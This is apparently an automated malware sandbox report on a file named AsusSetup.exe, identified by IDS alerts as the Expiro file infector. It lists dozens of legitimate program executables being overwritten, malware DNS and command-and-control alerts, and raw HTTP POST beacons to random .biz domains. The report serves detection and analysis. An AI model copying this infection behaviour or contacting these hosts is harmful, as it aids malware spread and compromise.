Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:64098 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49709 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:62067 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50012 -> 18.246.231.120:80
Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:53826 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.5:55131 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50068 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.5:53034 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.5:58235 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:61825 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:53017 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.5:60710 -> 1.1.1.1:53
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Source: unknownNetwork traffic detected: DNS query count 128
Source: global trafficDNS traffic detected: number of DNS queries: 128
Source: Joe Sandbox ViewIP Address: 165.160.15.20 165.160.15.20
Source: Joe Sandbox ViewIP Address: 3.254.94.185 3.254.94.185
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49707
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49707
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49919
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49919
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49930
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49930
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:49975
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:49975
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49966
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49966
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:50012
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:50012
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50006
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50006
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50002
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50002
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:50023
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:50023
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50003
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50003
Source: global trafficHTTP traffic detected: POST /ea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global trafficHTTP traffic detected: POST /juldvutdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global trafficHTTP traffic detected: POST /flh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /nxfilvvdujkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global trafficHTTP traffic detected: POST /vicdeig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global trafficHTTP traffic detected: POST /fwyvvonbgan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wurutvkart HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /agsaomftijm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
